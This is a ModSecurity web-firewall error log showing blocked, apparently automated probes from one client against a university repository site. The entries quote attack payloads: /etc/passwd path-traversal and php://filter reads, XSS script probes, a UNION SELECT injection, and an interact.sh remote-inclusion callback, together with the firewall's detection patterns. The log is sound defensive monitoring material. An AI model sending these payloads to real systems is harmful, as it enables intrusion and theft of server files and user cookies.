[Tue Aug 29 11:53:25.853212 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xcCo-f0AAAn4058AAAAW"]
[Tue Aug 29 11:53:25.928425 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAoz71YAAAAS"]
[Tue Aug 29 11:53:27.011872 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAni-EUAAAAU"]
[Tue Aug 29 11:53:27.841083 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoz71wAAAAS"]
[Tue Aug 29 11:53:27.898715 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAofm74AAAAX"]
[Tue Aug 29 11:53:28.048490 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAoXJxoAAAAP"]
[Tue Aug 29 11:53:28.979894 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAoyGzgAAAAI"]
[Tue Aug 29 11:53:29.375588 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAnHQrcAAAAT"]
[Tue Aug 29 11:53:29.379705 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15ycCo-f0AAAoT7YoAAAAD"]
[Tue Aug 29 11:53:30.599899 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAn406cAAAAW"]
[Tue Aug 29 11:53:31.242512 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoAk0cAAAAC"]
[Tue Aug 29 11:53:34.118696 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zsCo-f0AAAo2m4oAAAAA"]
[Tue Aug 29 11:53:35.324562 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15z8Co-f0AAAoW7R4AAAAJ"]
[Tue Aug 29 11:53:35.817463 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAoLfVUAAAAG"]
[Tue Aug 29 11:53:37.776376 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAolKYcAAAAe"]
[Tue Aug 29 11:53:38.623493 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO150sCo-f0AAAot8SUAAAAn"]
[Tue Aug 29 11:53:41.934738 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAAoW7TQAAAAJ"]
[Tue Aug 29 11:53:42.679358 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAoGFegAAAAE"]
[Tue Aug 29 11:53:42.804960 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAnHQtgAAAAT"]
[Tue Aug 29 11:53:43.600530 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAoLfWcAAAAG"]
[Tue Aug 29 11:53:43.721759 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAot8S0AAAAn"]
[Tue Aug 29 11:53:45.538810 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAApIdjEAAAAU"]
[Tue Aug 29 11:53:45.541646 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAoW7UAAAAAJ"]
[Tue Aug 29 11:53:45.628347 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoLfW4AAAAG"]
[Tue Aug 29 11:53:47.099526 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAolKZgAAAAe"]
[Tue Aug 29 11:53:48.091811 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAofm@YAAAAX"]
[Tue Aug 29 11:53:50.937717 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAoGFgUAAAAE"]
[Tue Aug 29 11:53:51.719863 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAApIdlEAAAAU"]
[Tue Aug 29 11:53:52.801438 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAApIdlIAAAAU"]
